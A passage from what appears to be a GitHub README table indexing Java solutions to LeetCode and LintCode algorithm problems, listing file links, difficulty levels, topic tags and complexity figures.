Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/Submatrix%20Sum.java)|Medium|[Array, Hash Table, PreSum]|||Java|175| |N/A|[Zigzag Iterator.java](https://github.com/awangdev/LintCode/blob/master/Java/Zigzag%20Iterator.java)|Medium|[BST]|||Java|176| |N/A|[Find the Connected Component in the Undirected Graph.java](https://github.com/awangdev/LintCode/blob/master/Java/Find%20the%20Connected%20Component%20in%20the%20Undirected%20Graph.java)|Medium|[BFS, DFS]|||Java|177| |N/A|[Implement Stack.java](https://github.com/awangdev/LintCode/blob/master/Java/Implement%20Stack.java)|Easy|[Stack]|||Java|178| |N/A|[Number of Airplane in the sky.java](https://github.com/awangdev/LintCode/blob/master/Java/Number%20of%20Airplane%20in%20the%20sky.java)|Medium|[Array, Interval, PriorityQueue, Sort, Sweep Line]|||Java|179| |N/A|[Surrounded Regions.java](https://github.com/awangdev/LintCode/blob/master/Java/Surrounded%20Regions.java)|Medium|[BFS, DFS, Matrix DFS, Union Find]|||Java|180| |N/A|[Wildcard Matching.java](https://github.com/awangdev/LintCode/blob/master/Java/Wildcard%20Matching.java)|Hard|[Backtracking, DP, Double Sequence DP, Greedy, Sequence DP, String]|||Java|181| |N/A|[Expression Add Operators.java](https://github.com/awangdev/LintCode/blob/master/Java/Expression%20Add%20Operators.java)|Hard|[Backtracking, DFS, Divide and Conquer, String]|O(4^n)|O(4^n)|Java|182| |N/A|[Cracking the Safe.java](https://github.com/awangdev/LintCode/blob/master/Java/Cracking%20the%20Safe.java)|Hard|[DFS, Greedy, Math]|||Java|183| |N/A|[Unique Word Abbreviation.java](https://github.com/awangdev/LintCode/blob/master/Java/Unique%20Word%20Abbreviation.java)|Medium|[Design, Hash Table]|||Java|184| |N/A|[Best Time to Buy and Sell Stock IV.java](https://github.com/awangdev/LintCode/blob/master/Java/Best%20Time%20to%20Buy%20and%20Sell%20Stock%20IV.java)|Hard|[DP, Sequence DP]|||Java|185| |N/A|[Find Minimum in Rotated Sorted Array II.java](https://github.com/awangdev/LintCode/blob/master/Java/Find%20Minimum%20in%20Rotated%20Sorted%20Array%20II.java)|Hard|[Array, Binary Search]|||Java|186| |N/A|[Longest Valid Parentheses.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Valid%20Parentheses.java)|Hard|[Coordinate DP, Stack, String]|||Java|187| |N/A|[Ugly Number II.java](https://github.com/awangdev/LintCode/blob/master/Java/Ugly%20Number%20II.java)|Medium|[DP, Enumeration, Heap, Math, PriorityQueue]|O(n)|O(n)|Java|188| |N/A|[Add Two Numbers II.java](https://github.com/awangdev/LintCode/blob/master/Java/Add%20Two%20Numbers%20II.java)|Medium|[Linked List]|||Java|189| |N/A|[Maximum Average Subarray II.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Average%20Subarray%20II.java)|Review|[Array, Binary Search, PreSum]|||Java|190| |N/A|[Expression Tree Build.java](https://github.com/awangdev/LintCode/blob/master/Java/Expression%20Tree%20Build.java)|Hard|[Binary Tree, Expression Tree, Minimum Binary Tree, Stack]|||Java|191| |N/A|[Merge Two Binary Trees.java](https://github.com/awangdev/LintCode/blob/master/Java/Merge%20Two%20Binary%20Trees.java)|Easy|[DFS, Tree]|||Java|192| |N/A|[Copy Books.java](https://github.com/awangdev/LintCode/blob/master/Java/Copy%20Books.java)|Hard|[Binary Search, DP, Partition DP]|||Java|193| |N/A|[Power of Three.java](https://github.com/awangdev/LintCode/blob/master/Java/Power%20of%20Three.java)|Easy|[Math]|||Java|194| |N/A|[Sort Colors II.java](https://github.com/awangdev/LintCode/blob/master/Java/Sort%20Colors%20II.java)|Medium|[Partition, Quick Sort, Sort, Two Pointers]|||Java|195| |N/A|[Maximum Subarray III.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Subarray%20III.java)|Review|[]|||Java|196| |N/A|[Path Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/Path%20Sum%20II.java)|Easy|[Backtracking, DFS, Tree]|||Java|197| |N/A|[Segment Tree Query II.java](https://github.com/awangdev/LintCode/blob/master/Java/Segment%20Tree%20Query%20II.java)|Medium|[Binary Tree, DFS, Divide and Conquer, Lint, Segment Tree]|||Java|198| |N/A|[Shortest Distance from All Buildings.java](https://github.com/awangdev/LintCode/blob/master/Java/Shortest%20Distance%20from%20All%20Buildings.java)|Hard|[BFS]|||Java|199| |N/A|[Brick Wall.java](https://github.com/awangdev/LintCode/blob/master/Java/Brick%20Wall.java)|Medium|[Hash Table]|O(mn)|O(X), X = max wall width|Java|200| |N/A|[Longest Increasing Path in a Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Increasing%20Path%20in%20a%20Matrix.java)|Hard|[Coordinate DP, DFS, DP, Memoization, Topological Sort]|||Java|201| |N/A|[Interleaving String.java](https://github.com/awangdev/LintCode/blob/master/Java/Interleaving%20String.java)|Hard|[DP, String]|||Java|202| |N/A|[Shuffle an Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Shuffle%20an%20Array.java)|Medium|[Permutation]|||Java|203| |N/A|[Recover Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Recover%20Binary%20Search%20Tree.java)|Hard|[BST, DFS, Tree]|||Java|204| |N/A|[My Calendar I.java](https://github.com/awangdev/LintCode/blob/master/Java/My%20Calendar%20I.java)|Medium|[Array, TreeMap]|||Java|205| |N/A|[Evaluate Reverse Polish Notation.java](https://github.com/awangdev/LintCode/blob/master/Java/Evaluate%20Reverse%20Polish%20Notation.java)|Medium|[Stack]|O(n)|O(n)|Java|206| |N/A|[Counting Bits.java](https://github.com/awangdev/LintCode/blob/master/Java/Counting%20Bits.java)|Medium|[Bit Manipulation, Bitwise DP, DP]|||Java|207| |N/A|[Sort Letters by Case.java](https://github.com/awangdev/LintCode/blob/master/Java/Sort%20Letters%20by%20Case.java)|Medium|[Partition, Sort, String, Two Pointers]|||Java|208| |N/A|[Two Strings Are Anagrams.java](https://github.com/awangdev/LintCode/blob/master/Java/Two%20Strings%20Are%20Anagrams.java)|Easy|[]|||Java|209| |N/A|[Two Sum II - Input array is sorted.java](https://github.com/awangdev/LintCode/blob/master/Java/Two%20Sum%20II%20-%20Input%20array%20is%20sorted.java)|Medium|[Array, Binary Search, Two Pointers]|||Java|210| |N/A|[[HackerRank]. Change to Anagram.java](https://github.com/awangdev/LintCode/blob/master/Java/[HackerRank].%20Change%20to%20Anagram.java)|Easy|[String]|||Java|211| |N/A|[Implement Queue using Stacks.java](https://github.com/awangdev/LintCode/blob/master/Java/Implement%20Queue%20using%20Stacks.java)|Easy|[Design, Stack]|||Java|212| |N/A|[Basic Calculator.java](https://github.com/awangdev/LintCode/blob/master/Java/Basic%20Calculator.java)|Hard|[Binary Tree, Expression Tree, Math, Minimum Binary Tree, Stack]|||Java|213| |N/A|[Word Squares.java](https://github.com/awangdev/LintCode/blob/master/Java/Word%20Squares.java)|Hard|[Backtracking, Trie]|||Java|214| |N/A|[Insertion Sort List.java](https://github.com/awangdev/LintCode/blob/master/Java/Insertion%20Sort%20List.java)|Medium|[Linked List, Sort]|||Java|215| |N/A|[Interval Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/Interval%20Sum.java)|Medium|[Binary Search, Lint, Segment Tree]|||Java|216| |N/A|[Strobogrammatic Number II.java](https://github.com/awangdev/LintCode/blob/master/Java/Strobogrammatic%20Number%20II.java)|Medium|[DFS, Enumeration, Math, Sequence DFS]|||Java|217| |N/A|[The Maze II.java](https://github.com/awangdev/LintCode/blob/master/Java/The%20Maze%20II.java)|Medium|[BFS, DFS, PriorityQueue]|||Java|218| |N/A|[k Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/k%20Sum.java)|Hard|[DP]|||Java|219| |N/A|[Coins in a Line III.java](https://github.com/awangdev/LintCode/blob/master/Java/Coins%20in%20a%20Line%20III.java)|Hard|[Array, DP, Game Theory, Interval DP, Memoization]|||Java|220| |N/A|[Convert Sorted List to Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Convert%20Sorted%20List%20to%20Binary%20Search%20Tree.java)|Medium|[BST, DFS, Divide and Conquer, Linked List]|||Java|221| |N/A|[Guess Number Higher or Lower.java](https://github.com/awangdev/LintCode/blob/master/Java/Guess%20Number%20Higher%20or%20Lower.java)|Easy|[Binary Search]|||Java|222| |N/A|[Trapping Rain Water II.java](https://github.com/awangdev/LintCode/blob/master/Java/Trapping%20Rain%20Water%20II.java)|Hard|[BFS, Heap, MinHeap, PriorityQueue]|||Java|223| |N/A|[Bricks Falling When Hit.java](https://github.com/awangdev/LintCode/blob/master/Java/Bricks%20Falling%20When%20Hit.java)|Hard|[Union Find]|||Java|224| |N/A|[Subarray Sum Closest.java](https://github.com/awangdev/LintCode/blob/master/Java/Subarray%20Sum%20Closest.java)|Medium|[PreSum, PriorityQueue, Sort, Subarray]|O(nlogn)|O(n)|Java|225| |N/A|[Burst Balloons.java](https://github.com/awangdev/LintCode/blob/master/Java/Burst%20Balloons.java)|Hard|[DP, Divide and Conquer, Interval DP, Memoization]|||Java|226| |N/A|[Partition Array by Odd and Even.java](https://github.com/awangdev/LintCode/blob/master/Java/Partition%20Array%20by%20Odd%20and%20Even.java)|Easy|[Array, Two Pointers]|||Java|227| |N/A|[Best Time to Buy and Sell Stock with Cooldown.java](https://github.com/awangdev/LintCode/blob/master/Java/Best%20Time%20to%20Buy%20and%20Sell%20Stock%20with%20Cooldown.java)|Medium|[DP]|||Java|228| |N/A|[Palindrome Partitioning II.java](https://github.com/awangdev/LintCode/blob/master/Java/Palindrome%20Partitioning%20II.java)|Hard|[DP, Partition DP]|||Java|229| |N/A|[Convert Binary Search Tree to Sorted Doubly Linked List (extra space).java](https://github.com/awangdev/LintCode/blob/master/Java/Convert%20Binary%20Search%20Tree%20to%20Sorted%20Doubly%20Linked%20List%20(extra%20space).java)|Medium|[Linked List, Stack, Tree]|O(n)|O(n)|Java|230| |N/A|[Kth Largest Element in an Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Kth%20Largest%20Element%20in%20an%20Array.java)|Medium|[Divide and Conquer, Heap, MinHeap, PriorityQueue, Quick Sort]|||Java|231| |N/A|[Sliding Puzzle.java](https://github.com/awangdev/LintCode/blob/master/Java/Sliding%20Puzzle.java)|Hard|[BFS, Graph]|||Java|232| |N/A|[Interval Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/Interval%20Sum%20II.java)|Hard|[Binary Search, Lint, Segment Tree]|||Java|233| |N/A|[Add Digits.java](https://github.com/awangdev/LintCode/blob/master/Java/Add%20Digits.java)|Easy|[Math]|||Java|234| |N/A|[HashWithCustomizedClass(LinkedList).java](https://github.com/awangdev/LintCode/blob/master/Java/HashWithCustomizedClass(LinkedList).java)|Medium|[Hash Table]|||Java|235| |N/A|[Maximum Vacation Days.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Vacation%20Days.java)|Hard|[DP]|||Java|236| |N/A|[Smallest Subtree with all the Deepest Nodes.java](https://github.com/awangdev/LintCode/blob/master/Java/Smallest%20Subtree%20with%20all%20the%20Deepest%20Nodes.java)|Medium|[DFS, Divide and Conquer, Tree]|O(n)|O(n)|Java|237| |N/A|[Kth Smallest Element in a Sorted Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/Kth%20Smallest%20Element%20in%20a%20Sorted%20Matrix.java)|Medium|[Binary Search, Heap]|O(n + klogn)|O(n)|Java|238| |N/A|[Combination Sum III.java](https://github.com/awangdev/LintCode/blob/master/Java/Combination%20Sum%20III.java)|Medium|[Array, Backtracking, Combination, DFS]|||Java|239| |N/A|[Last Position of Target.java](https://github.com/awangdev/LintCode/blob/master/Java/Last%20Position%20of%20Target.java)|Easy|[Binary Search]|||Java|240| |N/A|[Path Sum III.java](https://github.com/awangdev/LintCode/blob/master/Java/Path%20Sum%20III.java)|Easy|[DFS, Double Recursive, Tree]|||Java|241| |N/A|[Convert Expression to Reverse Polish Notation.java](https://github.com/awangdev/LintCode/blob/master/Java/Convert%20Expression%20to%20Reverse%20Polish%20Notation.java)|Hard|[Binary Tree, DFS, Expression Tree, Stack]|||Java|242| |N/A|[Complete Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Complete%20Binary%20Tree.java)|Easy|[BFS, Tree]|||Java|243| |N/A|[Best Time to Buy and Sell Stock with Transaction Fee.java](https://github.com/awangdev/LintCode/blob/master/Java/Best%20Time%20to%20Buy%20and%20Sell%20Stock%20with%20Transaction%20Fee.java)|Medium|[Array, DP, Greedy, Sequence DP, Status DP]|O(n)|O(n), O(1) rolling array|Java|244| |N/A|[Pow(x, n).java](https://github.com/awangdev/LintCode/blob/master/Java/Pow(x,%20n).java)|Medium|[Binary Search, Math]|||Java|245| |N/A|[Maximum Subarray II.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Subarray%20II.java)|Medium|[Array, DP, Greedy, PreSum, Sequence DP, Subarray]|||Java|246| |N/A|[Sort Colors.java](https://github.com/awangdev/LintCode/blob/master/Java/Sort%20Colors.java)|Medium|[Array, Partition, Quick Sort, Sort, Two Pointers]|||Java|247| |N/A|[Word Ladder II.java](https://github.com/awangdev/LintCode/blob/master/Java/Word%20Ladder%20II.java)|Hard|[Array, BFS, Backtracking, DFS, Hash Table, String]|||Java|248| |N/A|[Sum of Two Integers.java](https://github.com/awangdev/LintCode/blob/master/Java/Sum%20of%20Two%20Integers.java)|Easy|[Bit Manipulation]|||Java|249| |N/A|[Predict the Winner.java](https://github.com/awangdev/LintCode/blob/master/Java/Predict%20the%20Winner.java)|Medium|[DP, MiniMax]|||Java|250| |N/A|[Connecting Graph II.java](https://github.com/awangdev/LintCode/blob/master/Java/Connecting%20Graph%20II.java)|Medium|[Union Find]|||Java|251| |N/A|[Search Insert Position.java](https://github.com/awangdev/LintCode/blob/master/Java/Search%20Insert%20Position.java)|Easy|[]|||Java|252| |N/A|[Longest Univalue Path.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Univalue%20Path.java)|Easy|[]|||Java|253| |N/A|[Contains Duplicate III.java](https://github.com/awangdev/LintCode/blob/master/Java/Contains%20Duplicate%20III.java)|Medium|[BST]|||Java|254| |N/A|[Spiral Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/Spiral%20Matrix.java)|Medium|[Array, Enumeration]|||Java|255| |N/A|[Next Closest Time.java](https://github.com/awangdev/LintCode/blob/master/Java/Next%20Closest%20Time.java)|Medium|[Basic Implementation, Enumeration, String]|||Java|256| |N/A|[Group Shifted Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/Group%20Shifted%20Strings.java)|Medium|[Hash Table, String]|||Java|257| |N/A|[The Maze III.java](https://github.com/awangdev/LintCode/blob/master/Java/The%20Maze%20III.java)|Hard|[BFS, DFS, PriorityQueue]|||Java|258| |N/A|[Coins in a Line.java](https://github.com/awangdev/LintCode/blob/master/Java/Coins%20in%20a%20Line.java)|Medium|[DP, Game Theory, Greedy]|||Java|259| |N/A|[Binary Tree Longest Consecutive Sequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Binary%20Tree%20Longest%20Consecutive%20Sequence.java)|Medium|[DFS, Divide and Conquer, Tree]|||Java|260| |N/A|[The Spiral Matrix II.java](https://github.com/awangdev/LintCode/blob/master/Java/The%20Spiral%20Matrix%20II.java)|Medium|[Array]|||Java|261| |N/A|[Trim a Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Trim%20a%20Binary%20Search%20Tree.java)|Easy|[BST, Tree]|||Java|262| |N/A|[Number Of Corner Rectangles.java](https://github.com/awangdev/LintCode/blob/master/Java/Number%20Of%20Corner%20Rectangles.java)|Medium|[DP, Math]|||Java|263| |N/A|[Queue Reconstruction by Height.java](https://github.com/awangdev/LintCode/blob/master/Java/Queue%20Reconstruction%20by%20Height.java)|Medium|[Greedy]|||Java|264| |N/A|[Minimum Swaps To Make Sequences Increasing.java](https://github.com/awangdev/LintCode/blob/master/Java/Minimum%20Swaps%20To%20Make%20Sequences%20Increasing.java)|Medium|[Coordinate DP, DP, Status DP]|||Java|265| |N/A|[Interleaving Positive and Negative Numbers.java](https://github.com/awangdev/LintCode/blob/master/Java/Interleaving%20Positive%20and%20Negative%20Numbers.java)|Medium|[Two Pointers]|||Java|266| |N/A|[Path Sum IV.java](https://github.com/awangdev/LintCode/blob/master/Java/Path%20Sum%20IV.java)|Medium|[DFS, Hash Table, Tree]|||Java|267| |N/A|[Excel Sheet Column Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Excel%20Sheet%20Column%20Number.java)|Easy|[Math]|||Java|268| |N/A|[Target Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/Target%20Sum.java)|Medium|[DFS, DP]|||Java|269| |N/A|[Partition Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Partition%20Array.java)|Medium|[Array, Quick Sort, Sort, Two Pointers]|||Java|270| |N/A|[Bus Routes.java](https://github.com/awangdev/LintCode/blob/master/Java/Bus%20Routes.java)|Hard|[BFS]|||Java|271| |N/A|[Max Sum of Rectangle No Larger Than K.java](https://github.com/awangdev/LintCode/blob/master/Java/Max%20Sum%20of%20Rectangle%20No%20Larger%20Than%20K.java)|Hard|[Array, BST, Binary Search, DP, Queue, TreeSet]|||Java|272| |N/A|[String Permutation.java](https://github.com/awangdev/LintCode/blob/master/Java/String%20Permutation.java)|Easy|[]|||Java|273| |N/A|[Maximum XOR of Two Numbers in an Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20XOR%20of%20Two%20Numbers%20in%20an%20Array.java)|Medium|[Bit Manipulation, Trie]|||Java|274| |N/A|[Search for a Range.java](https://github.com/awangdev/LintCode/blob/master/Java/Search%20for%20a%20Range.java)|Medium|[Array, Binary Search]|||Java|275| |N/A|[Palindrome Permutation II.java](https://github.com/awangdev/LintCode/blob/master/Java/Palindrome%20Permutation%20II.java)|Medium|[Backtracking, Permutation]|||Java|276| |N/A|[Populating Next Right Pointers in Each Node II.java](https://github.com/awangdev/LintCode/blob/master/Java/Populating%20Next%20Right%20Pointers%20in%20Each%20Node%20II.java)|Medium|[DFS, Tree]|O(n)|O(1)|Java|277| |N/A|[Nim Game.java](https://github.com/awangdev/LintCode/blob/master/Java/Nim%20Game.java)|Easy|[Brainteaser, DP, Game Theory]|||Java|278| |N/A|[Search a 2D Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/Search%20a%202D%20Matrix.java)|Medium|[Array, Binary Search]|||Java|279| |N/A|[Largest Rectangle in Histogram.java](https://github.com/awangdev/LintCode/blob/master/Java/Largest%20Rectangle%20in%20Histogram.java)|Hard|[Array, Monotonous Stack, Stack]|||Java|280| |[lint]|[[lint]. Merge k Sorted Arrays.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Merge%20k%20Sorted%20Arrays.java)|Medium|[Heap, MinHeap, PriorityQueue]|O(nlogk)|O(k)|Java|281| |[lint]|[[lint]. Segment Tree Build II.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Segment%20Tree%20Build%20II.java)|Medium|[Binary Tree, Divide and Conquer, Lint, Segment Tree]|||Java|282| |[lint]|[[lint]. Nth to Last Node in List.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Nth%20to%20Last%20Node%20in%20List.java)|Easy|[Linked List, Lint]|||Java|283| |[lint]|[[lint]. Product of Array Exclude Itself.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Product%20of%20Array%20Exclude%20Itself.java)|Medium|[Array, Lint]|||Java|284| |[lint]|[[lint]. Compare Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Compare%20Strings.java)|Easy|[Lint, String]|||Java|285| |[lint]|[[lint]. Segment Tree Query.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Segment%20Tree%20Query.java)|Medium|[Binary Tree, DFS, Divide and Conquer, Lint, Segment Tree]|||Java|286| |[lint]|[[lint]. HashHeap.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20HashHeap.java)|Hard|[HashHeap, Heap, Lint]|||Java|287| |[lint]|[[lint]. Longest Words.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Longest%20Words.java)|Easy|[Hash Table, Lint, String]|||Java|288| |[lint]|[[lint]. Anagrams.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Anagrams.java)|Medium|[Array, Hash Table, Lint]|O(n)|O(n)|Java|289| |[lint]|[[lint]. 3 Sum Closest.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%203%20Sum%20Closest.java)|Medium|[Array, Lint, Two Pointers]|||Java|290| |[lint]|[[lint]. Unique Characters.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Unique%20Characters.java)|Easy|[Array, Lint, String]|||Java|291| |[lint]|[[lint]. Lowest Common Ancestor II.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Lowest%20Common%20Ancestor%20II.java)|Easy|[Hash Table, Lint, Tree]|||Java|292| |[lint]|[[lint]. Heapify.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Heapify.java)|Medium|[HashHeap, Heap, Lint, MinHeap]|||Java|293| |[lint]|[[lint]. Subarray Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Subarray%20Sum.java)|Easy|[Array, Hash Table, Lint, PreSum, Subarray]|O(n)|O(n)|Java|294| |[lint]|[[lint]. Recover Rotated Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Recover%20Rotated%20Sorted%20Array.java)|Easy|[Array, Lint]|||Java|295| |[lint]|[[lint]. 2 Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%202%20Sum%20II.java)|Medium|[Array, Binary Search, Lint, Two Pointers]|||Java|296| |[lint]|[[lint]. Segment Tree Build.java](https://github.com/awangdev/LintCode/blob/master/Java/[lint].%20Segment%20Tree%20Build.java)|Medium|[Binary Tree, Divide and Conquer, Lint, Segment Tree]|||Java|297| |[tool]|[[tool]. MergeSort.java](https://github.com/awangdev/LintCode/blob/master/Java/[tool].%20MergeSort.java)|Medium|[Lint, Merge Sort, Sort]|O(mlogn)|O(n)|Java|298| |[tool]|[[tool]. Hash Function.java](https://github.com/awangdev/LintCode/blob/master/Java/[tool].%20Hash%20Function.java)|Easy|[Hash Table, Lint]|O(1) get|O(n) store map|Java|299| |[tool]|[[tool]. UnionFind.java](https://github.com/awangdev/LintCode/blob/master/Java/[tool].%20UnionFind.java)|Medium|[Lint, Union Find]|O(n), with Path Compression O(mN), with Union by Rank O(logN)|O(n)|Java|300| |[tool]|[[tool]. Topological Sorting.java](https://github.com/awangdev/LintCode/blob/master/Java/[tool].%20Topological%20Sorting.java)|Medium|[BFS, DFS, Lint, Topological Sort]|O(V + E)|O(V + E)|Java|301| |36|[36. Valid Sudoku.java](https://github.com/awangdev/LintCode/blob/master/Java/36.%20Valid%20Sudoku.java)|Easy|[Enumeration, Hash Table]|(mn)|(mn)|Java|302| |359|[359. Logger Rate Limiter.java](https://github.com/awangdev/LintCode/blob/master/Java/359.%20Logger%20Rate%20Limiter.java)|Easy|[Design, Hash Table]|O(1)|O(n)|Java|303| |198|[198. House Robber.java](https://github.com/awangdev/LintCode/blob/master/Java/198.%20House%20Robber.java)|Easy|[DP, Sequence DP, Status DP]|O(n)|O(n) or rolling array O(1)|Java|304| |21|[21. Merge Two Sorted Lists.java](https://github.com/awangdev/LintCode/blob/master/Java/21.%20Merge%20Two%20Sorted%20Lists.java)|Easy|[Linked List]|O(n)|O(1)|Java|305| |102|[102. Binary Tree Level Order Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/102.%20Binary%20Tree%20Level%20Order%20Traversal.java)|Medium|[BFS, DFS, Tree]|O(n)|O(n)|Java|306| |788|[788. Rotated Digits.java](https://github.com/awangdev/LintCode/blob/master/Java/788.%20Rotated%20Digits.java)|Easy|[Basic Implementation, String]|O(n)|O(n)|Java|307| |42|[42. Trapping Rain Water.java](https://github.com/awangdev/LintCode/blob/master/Java/42.%20Trapping%20Rain%20Water.java)|Hard|[Array, Stack, Two Pointers]|O(n)|O(1)|Java|308| |347|[347. Top K Frequent Elements.java](https://github.com/awangdev/LintCode/blob/master/Java/347.%20Top%20K%20Frequent%20Elements.java)|Medium|[Hash Table, Heap, MaxHeap, MinHeap, PriorityQueue]|O(n)|O(n)|Java|309| |269|[269. Alien Dictionary.java](https://github.com/awangdev/LintCode/blob/master/Java/269.%20Alien%20Dictionary.java)|Hard|[BFS, Backtracking, DFS, Graph, Topological Sort]|O(n), n = # of graph edges|O(n)|Java|310| |237|[237. Delete Node in a Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/237.%20Delete%20Node%20in%20a%20Linked%20List.java)|Easy|[Linked List]|||Java|311| |142|[142. Linked List Cycle II.java](https://github.com/awangdev/LintCode/blob/master/Java/142.%20Linked%20List%20Cycle%20II.java)|Medium|[Cycle Detection, Linked List, Slow Fast Pointer, Two Pointers]|O(n)|O(1)|Java|312| |448|[448. Find All Numbers Disappeared in an Array.java](https://github.com/awangdev/LintCode/blob/master/Java/448.%20Find%20All%20Numbers%20Disappeared%20in%20an%20Array.java)|Easy|[Array, Bucket Sort]|O(n)|O(1)|Java|313| |360|[360. Sort Transformed Array.java](https://github.com/awangdev/LintCode/blob/master/Java/360.%20Sort%20Transformed%20Array.java)|Medium|[Math, Two Pointers]|O(n)|O(n) store result|Java|314| |22|[22. Generate Parentheses.java](https://github.com/awangdev/LintCode/blob/master/Java/22.%20Generate%20Parentheses.java)|Medium|[Backtracking, DFS, Sequence DFS, String]|O(2^n)|O(2^n)|Java|315| |849|[849. Maximize Distance to Closest Person.java](https://github.com/awangdev/LintCode/blob/master/Java/849.%20Maximize%20Distance%20to%20Closest%20Person.java)|Easy|[Array, Basic Implementation, Two Pointers]|O(n)|O(1)|Java|316| |408|[408. Valid Word Abbreviation.java](https://github.com/awangdev/LintCode/blob/master/Java/408.%20Valid%20Word%20Abbreviation.java)|Easy|[Basic Implementation, String]|||Java|317| |415|[415. Add Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/415.%20Add%20Strings.java)|Easy|[Basic Implementation, Math, String]|O(n)|O(n)|Java|318| |83|[83. Remove Duplicates from Sorted List.java](https://github.com/awangdev/LintCode/blob/master/Java/83.%20Remove%20Duplicates%20from%20Sorted%20List.java)|Easy|[Linked List]|||Java|319| |1108|[1108. Defanging an IP Address.java](https://github.com/awangdev/LintCode/blob/master/Java/1108.%20Defanging%20an%20IP%20Address.java)|Easy|[Basic Implementation, String]|||Java|320| |1021|[1021. Remove Outermost Parentheses.java](https://github.com/awangdev/LintCode/blob/master/Java/1021.%20Remove%20Outermost%20Parentheses.java)|Easy|[Stack]|||Java|321| |236|[236. Lowest Common Ancestor of a Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/236.%20Lowest%20Common%20Ancestor%20of%20a%20Binary%20Tree.java)|Medium|[DFS, Tree]|O(n)|O(n)|Java|322| |766|[766. Toeplitz Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/766.%20Toeplitz%20Matrix.java)|Easy|[Array]|O(mn)|O(1)|Java|323| |953|[953. Verifying an Alien Dictionary.java](https://github.com/awangdev/LintCode/blob/master/Java/953.%20Verifying%20an%20Alien%20Dictionary.java)|Easy|[Hash Table]|O(nm)|O(1)|Java|324| |1053|[1053. Previous Permutation With One Swap.java](https://github.com/awangdev/LintCode/blob/master/Java/1053.%20Previous%20Permutation%20With%20One%20Swap.java)|Medium|[Array, Greedy, Permutation]|O(n)|O(1)|Java|325| |1213|[1213. Intersection of Three Sorted Arrays.java](https://github.com/awangdev/LintCode/blob/master/Java/1213.%20Intersection%20of%20Three%20Sorted%20Arrays.java)|Easy|[Hash Table, Two Pointers]|O(m + n + h) two pointers approach|O(1)|Java|326| |383|[383. Ransom Note.java](https://github.com/awangdev/LintCode/blob/master/Java/383.%20Ransom%20Note.java)|Easy|[Basic Implementation, String]|||Java|327| |56|[56. Merge Intervals.java](https://github.com/awangdev/LintCode/blob/master/Java/56.%20Merge%20Intervals.java)|Medium|[Array, PriorityQueue, Sort, Sweep Line]|O(nlogn)|O(n)|Java|328| |252|[252. Meeting Rooms.java](https://github.com/awangdev/LintCode/blob/master/Java/252.%20Meeting%20Rooms.java)|Easy|[PriorityQueue, Sort, Sweep Line]|O(nlogn)|O(1)|Java|329| |665|[665. Non-decreasing Array.java](https://github.com/awangdev/LintCode/blob/master/Java/665.%20Non-decreasing%20Array.java)|Easy|[Array]|O(n)|O(1)|Java|330| |843|[843. Guess the Word.java](https://github.com/awangdev/LintCode/blob/master/Java/843.%20Guess%20the%20Word.java)|Hard|[MiniMax]|TODO|TODO|Java|331| |986|[986. Interval List Intersections.java](https://github.com/awangdev/LintCode/blob/master/Java/986.%20Interval%20List%20Intersections.java)|Medium|[Two Pointers]|O(n)|O(1)|Java|332| |76|[76. Minimum Window Substring.java](https://github.com/awangdev/LintCode/blob/master/Java/76.%20Minimum%20Window%20Substring.java)|Hard|[Hash Table, Sliding Window, String, Two Pointers]|O(n)|O(1)|Java|333| |293|[293. Flip Game.java](https://github.com/awangdev/LintCode/blob/master/Java/293.%20Flip%20Game.java)|Easy|[String]|||Java|334| |244|[244. Shortest Word Distance II.java](https://github.com/awangdev/LintCode/blob/master/Java/244.%20Shortest%20Word%20Distance%20II.java)|Medium|[Array, Design, Hash Table, Two Pointers]|O(n) to build map, O(a + b) to query|O(n)|Java|335| |686|[686. Repeated String Match.java](https://github.com/awangdev/LintCode/blob/master/Java/686.%20Repeated%20String%20Match.java)|Easy|[Basic Implementation, Edge Case, String]|||Java|336| |80|[80.Remove Duplicates from Sorted Array 